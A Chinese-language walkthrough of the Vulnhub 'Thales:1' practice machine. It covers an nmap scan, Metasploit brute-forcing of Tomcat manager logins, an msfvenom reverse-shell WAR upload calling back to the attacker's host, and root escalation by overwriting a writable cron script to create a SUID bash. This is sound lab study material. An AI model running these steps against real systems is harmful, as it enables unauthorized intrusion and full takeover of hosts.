Vulnhub: Thales:1靶机

kali:192.168.111.111

靶机:192.168.111.132

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.132

Vulnhub: Thales:1靶机_第1张图片

8080端口为tomcat

Vulnhub: Thales:1靶机_第2张图片

使用msf爆破账号密码

msfdb run
use auxiliary/scanner/http/tomcat_mgr_login
set rhosts 192.168.111.132
run

Vulnhub: Thales:1靶机_第3张图片

登录后台后上传war包拿shell

#生成war包
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.111.111 lport=4444 -f war -o test.war

Vulnhub: Thales:1靶机_第4张图片

查看war包中的反弹shell

7z l test.war

Vulnhub: Thales:1靶机_第5张图片

上传war包

Vulnhub: Thales:1靶机_第6张图片

Vulnhub: Thales:1靶机_第7张图片

访问http://192.168.111.132:8080/test/hlfjpccnnzt.jsp获得反弹shell

Vulnhub: Thales:1靶机_第8张图片

或者使用msf的exploit/multi/http/tomcat_mgr_upload模块也可以拿shell

msfdb run
use exploit/multi/http/tomcat_mgr_upload
set rport 8080
set rhosts 192.168.111.132
set httpusername tomcat
set httppassword role1
set FingerprintCheck false
run

Vulnhub: Thales:1靶机_第9张图片

提权

在/home/thales/notes.txt提示一个脚本,该脚本有可写权限

用pspy64收集到存在计划任务执行/usr/local/bin/backup.sh

Vulnhub: Thales:1靶机_第10张图片

修改该脚本提权

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' > /usr/local/bin/backup.sh
/tmp/bash -p

Vulnhub: Thales:1靶机_第11张图片

你可能感兴趣的:(安全,网络安全,web安全)